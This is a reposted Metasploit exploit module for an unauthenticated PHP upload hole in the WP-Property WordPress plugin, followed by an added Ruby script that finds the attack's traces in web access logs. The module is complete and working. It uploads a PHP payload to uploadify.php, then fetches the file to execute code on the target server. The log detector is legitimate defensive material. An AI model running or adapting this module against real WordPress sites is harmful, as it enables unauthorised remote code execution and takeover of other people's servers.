WordPress WP-Property PHP File Upload Vulnerability

Posted on 2013-1-4 19:51:30
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def check
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end

Don't ask me what this code is or how to use it; I'm talking about msf.
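
The request sequence the module performs (a POST to uploadify.php, then a GET for a .php file in the same directory) leaves a recognizable trace in web access logs. The following Ruby is an added example for defenders, not part of the original post or of Metasploit; it assumes common/combined-format access logs, and the function names and sample log lines are constructed for illustration.

```ruby
require 'uri'

# Directory the module above targets; the plugin's own PHP file here is uploadify.php.
UPLOADIFY_DIR = 'wp-content/plugins/wp-property/third-party/uploadify/'
# Common/combined log format: client, [time], "METHOD target PROTO", status
LOG_RE = /\A(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) [^"]*" (\d{3})/

def parse_line(line)
  m = LOG_RE.match(line) or return nil
  raw = m[4].split('?', 2).first.to_s
  path = (URI.decode_www_form_component(raw) rescue raw) # undo %-encoding
  { client: m[1], time: m[2], method: m[3], path: path, status: m[5].to_i }
end

# Returns findings in log order:
#   :upload_attempt      - POST to uploadify.php
#   :dropped_php_request - request for any other .php file in that directory
def detect_uploadify_abuse(lines)
  uploaders = {} # clients that have already POSTed to uploadify.php
  findings = []
  lines.each do |line|
    req = parse_line(line) or next
    idx = req[:path].downcase.index(UPLOADIFY_DIR) or next
    file = req[:path][(idx + UPLOADIFY_DIR.length)..-1]
    if file.casecmp?('uploadify.php')
      next unless req[:method] == 'POST'
      uploaders[req[:client]] = true
      findings << req.merge(type: :upload_attempt)
    elsif file =~ /\.php\z/i
      findings << req.merge(type: :dropped_php_request,
                            after_upload: uploaders.key?(req[:client]))
    end
  end
  findings
end

# Constructed sample lines (documentation addresses, made-up file name).
SAMPLE_LOG = <<~LOG.lines
  198.51.100.7 - - [04/Jan/2013:19:40:01 +0800] "GET /wordpress/ HTTP/1.1" 200 5120
  192.0.2.10 - - [04/Jan/2013:19:41:12 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 0
  192.0.2.10 - - [04/Jan/2013:19:41:13 +0800] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 71
  192.0.2.10 - - [04/Jan/2013:19:41:14 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/qWzRt.php HTTP/1.1" 200 0
  198.51.100.7 - - [04/Jan/2013:19:45:00 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.css HTTP/1.1" 200 900
LOG

detect_uploadify_abuse(SAMPLE_LOG).each do |f|
  puts "#{f[:time]} #{f[:client]} #{f[:type]} #{f[:path]} -> #{f[:status]}"
end
```

A `dropped_php_request` finding with status 200 is the one to triage first, since it means a PHP file other than the plugin's own was served from that directory.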
